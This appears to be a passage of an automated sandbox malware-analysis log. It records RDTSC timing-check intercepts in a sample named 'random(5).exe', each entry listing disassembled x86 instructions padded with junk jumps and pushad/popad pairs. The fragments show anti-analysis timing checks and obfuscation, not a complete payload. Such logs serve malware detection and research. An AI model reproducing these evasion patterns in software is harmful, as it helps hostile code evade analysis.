Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9083E second address: 6E90873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C0h 0x00000009 add ch, 00000068h 0x0000000c jmp 00007F519CFC89BBh 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov dx, E862h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90873 second address: 6E90878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90878 second address: 6E908AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CFC89C4h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+0000008Ch] 0x00000013 jmp 00007F519CFC89BCh 0x00000018 mov dword ptr [esi+34h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E908AF second address: 6E908C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E908C1 second address: 6E9091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007F519CFC89C7h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 pushad 0x00000014 jmp 00007F519CFC89C4h 0x00000019 jmp 00007F519CFC89C2h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+1Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov di, A960h 0x00000029 mov eax, edx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9091B second address: 6E90930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C381h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90930 second address: 6E90974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e jmp 00007F519CFC89BEh 0x00000013 mov eax, dword ptr [ebx+20h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F519CFC89C7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90974 second address: 6E90A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov dh, A1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 jmp 00007F519CD4C385h 0x00000017 popad 0x00000018 lea eax, dword ptr [ebx+00000080h] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F519CD4C389h 0x00000026 add ecx, 7E16E3E6h 0x0000002c jmp 00007F519CD4C381h 0x00000031 popfd 0x00000032 popad 0x00000033 mov ah, CEh 0x00000035 popad 0x00000036 push 00000001h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F519CD4C389h 0x0000003f sub eax, 787293F6h 0x00000045 jmp 00007F519CD4C381h 0x0000004a popfd 0x0000004b push ecx 0x0000004c mov esi, ebx 0x0000004e pop edx 0x0000004f popad 0x00000050 nop 0x00000051 pushad 0x00000052 movzx eax, dx 0x00000055 jmp 00007F519CD4C381h 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F519CD4C381h 0x00000061 nop 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90A43 second address: 6E90A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90A47 second address: 6E90A5F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 26CBh 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, 7F3Eh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90A5F second address: 6E90A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F519CFC89C0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F519CFC89BCh 0x00000018 mov ah, F3h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B07 second address: 6E90B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 mov di, ax 0x00000016 popad 0x00000017 js 00007F520C0FAF15h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B30 second address: 6E90B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B36 second address: 6E90B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B3C second address: 6E90B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B5D second address: 6E90B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B61 second address: 6E90B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90B67 second address: 6E90BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov esi, 1627B58Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 pushad 0x00000011 mov esi, 7D1B0945h 0x00000016 mov dx, si 0x00000019 popad 0x0000001a lea eax, dword ptr [ebx+78h] 0x0000001d pushad 0x0000001e call 00007F519CD4C389h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90BA0 second address: 6E90BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push 00000001h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F519CFC89C6h 0x00000011 jmp 00007F519CFC89C5h 0x00000016 popfd 0x00000017 mov edi, ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90BDB second address: 6E90C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F519CD4C37Ch 0x00000011 and ax, F3F8h 0x00000016 jmp 00007F519CD4C37Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F519CD4C388h 0x00000022 jmp 00007F519CD4C385h 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F519CD4C381h 0x0000002f nop 0x00000030 jmp 00007F519CD4C37Eh 0x00000035 lea eax, dword ptr [ebp-08h] 0x00000038 jmp 00007F519CD4C380h 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F519CD4C387h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90D2D second address: 6E90D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90D31 second address: 6E90D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90D4E second address: 6E90E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F519CFC89BEh 0x00000011 push 00000001h 0x00000013 jmp 00007F519CFC89C0h 0x00000018 nop 0x00000019 pushad 0x0000001a mov cx, F83Dh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F519CFC89C8h 0x00000025 jmp 00007F519CFC89C5h 0x0000002a popfd 0x0000002b call 00007F519CFC89C0h 0x00000030 pop eax 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007F519CFC89C0h 0x00000039 nop 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F519CFC89BEh 0x00000041 xor cx, 7A08h 0x00000046 jmp 00007F519CFC89BBh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007F519CFC89C8h 0x00000052 and esi, 28649C68h 0x00000058 jmp 00007F519CFC89BBh 0x0000005d popfd 0x0000005e popad 0x0000005f lea eax, dword ptr [ebp-18h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90E37 second address: 6E90E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90E3B second address: 6E90E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90EEA second address: 6E90EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90EEE second address: 6E90EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90EF2 second address: 6E90EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90EF8 second address: 6E90EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90EFE second address: 6E90F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90F02 second address: 6E90F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90F06 second address: 6E90F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c mov ax, 22CBh 0x00000010 pushfd 0x00000011 jmp 00007F519CD4C380h 0x00000016 xor ax, 3DD8h 0x0000001b jmp 00007F519CD4C37Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ecx, esi 0x00000024 pushad 0x00000025 mov bl, ah 0x00000027 mov edx, 1328B1B4h 0x0000002c popad 0x0000002d mov dword ptr [esi+0Ch], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F519CD4C386h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90F5F second address: 6E90F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F519CFC89C1h 0x00000008 pop esi 0x00000009 mov ah, bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, 762C06ECh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F519CFC89C5h 0x0000001b pop eax 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90F9A second address: 6E90FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C383h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90FB1 second address: 6E90FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90FB5 second address: 6E90FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90FC8 second address: 6E90FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90FCC second address: 6E90FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90FD2 second address: 6E91013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 pushfd 0x00000006 jmp 00007F519CFC89C1h 0x0000000b adc cl, FFFFFFF6h 0x0000000e jmp 00007F519CFC89C1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lock cmpxchg dword ptr [edx], ecx 0x0000001b pushad 0x0000001c mov edx, esi 0x0000001e movzx eax, dx 0x00000021 popad 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91013 second address: 6E9102F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9102F second address: 6E91035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91035 second address: 6E91039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91039 second address: 6E91059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89C4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91059 second address: 6E91074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520C0FA9EAh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91074 second address: 6E91078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91078 second address: 6E9107C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9107C second address: 6E91082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91082 second address: 6E910E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+08h] 0x0000000d jmp 00007F519CD4C380h 0x00000012 mov eax, dword ptr [esi] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F519CD4C37Eh 0x0000001b add si, 1598h 0x00000020 jmp 00007F519CD4C37Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 mov edx, 59549EBAh 0x0000002c pop edx 0x0000002d popad 0x0000002e mov dword ptr [edx], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F519CD4C388h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E910E8 second address: 6E910F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E910F7 second address: 6E91162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 mov dword ptr [edx+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ebx, 216052D0h 0x0000001c pushfd 0x0000001d jmp 00007F519CD4C389h 0x00000022 sub ax, 0756h 0x00000027 jmp 00007F519CD4C381h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91162 second address: 6E91168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91168 second address: 6E91202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+08h] 0x0000000e jmp 00007F519CD4C386h 0x00000013 mov dword ptr [edx+08h], eax 0x00000016 jmp 00007F519CD4C380h 0x0000001b mov eax, dword ptr [esi+0Ch] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F519CD4C37Eh 0x00000025 adc ah, 00000038h 0x00000028 jmp 00007F519CD4C37Bh 0x0000002d popfd 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 mov dword ptr [edx+0Ch], eax 0x00000035 jmp 00007F519CD4C37Bh 0x0000003a mov eax, dword ptr [esi+10h] 0x0000003d jmp 00007F519CD4C386h 0x00000042 mov dword ptr [edx+10h], eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov bh, ah 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91202 second address: 6E91283 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F519CFC89C5h 0x0000000c or al, FFFFFFE6h 0x0000000f jmp 00007F519CFC89C1h 0x00000014 popfd 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+14h] 0x00000019 jmp 00007F519CFC89BEh 0x0000001e mov dword ptr [edx+14h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edx, 568AF4A0h 0x00000029 pushfd 0x0000002a jmp 00007F519CFC89C9h 0x0000002f xor esi, 7E5AB3A6h 0x00000035 jmp 00007F519CFC89C1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91283 second address: 6E91305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C387h 0x00000009 add si, A6DEh 0x0000000e jmp 00007F519CD4C389h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F519CD4C380h 0x0000001a adc cx, F6D8h 0x0000001f jmp 00007F519CD4C37Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov eax, dword ptr [esi+18h] 0x0000002b jmp 00007F519CD4C386h 0x00000030 mov dword ptr [edx+18h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov dl, 7Fh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91305 second address: 6E9130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9130A second address: 6E913BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C37Bh 0x00000009 add ah, FFFFFFFEh 0x0000000c jmp 00007F519CD4C389h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F519CD4C380h 0x00000018 sbb si, 65F8h 0x0000001d jmp 00007F519CD4C37Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [esi+1Ch] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov si, 6A41h 0x0000002f mov bh, cl 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007F519CD4C383h 0x00000038 add cx, 366Eh 0x0000003d jmp 00007F519CD4C389h 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [edx+1Ch], eax 0x00000047 jmp 00007F519CD4C37Eh 0x0000004c mov eax, dword ptr [esi+20h] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov bx, 7600h 0x00000056 mov cx, dx 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E913BA second address: 6E913C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E913C0 second address: 6E913FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F519CD4C385h 0x00000014 and ecx, 41967EB6h 0x0000001a jmp 00007F519CD4C381h 0x0000001f popfd 0x00000020 mov ebx, esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E913FF second address: 6E91405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91405 second address: 6E9145D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F519CD4C37Ch 0x00000014 and cx, 1908h 0x00000019 jmp 00007F519CD4C37Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F519CD4C388h 0x00000025 and esi, 1F25BB68h 0x0000002b jmp 00007F519CD4C37Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9145D second address: 6E914E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0561300Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+24h], eax 0x00000010 jmp 00007F519CFC89C7h 0x00000015 mov eax, dword ptr [esi+28h] 0x00000018 jmp 00007F519CFC89C6h 0x0000001d mov dword ptr [edx+28h], eax 0x00000020 jmp 00007F519CFC89C0h 0x00000025 mov ecx, dword ptr [esi+2Ch] 0x00000028 jmp 00007F519CFC89C0h 0x0000002d mov dword ptr [edx+2Ch], ecx 0x00000030 jmp 00007F519CFC89C0h 0x00000035 mov ax, word ptr [esi+30h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E914E0 second address: 6E914E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E914E4 second address: 6E914EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E914EA second address: 6E914F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E914F0 second address: 6E914F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E914F4 second address: 6E91512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
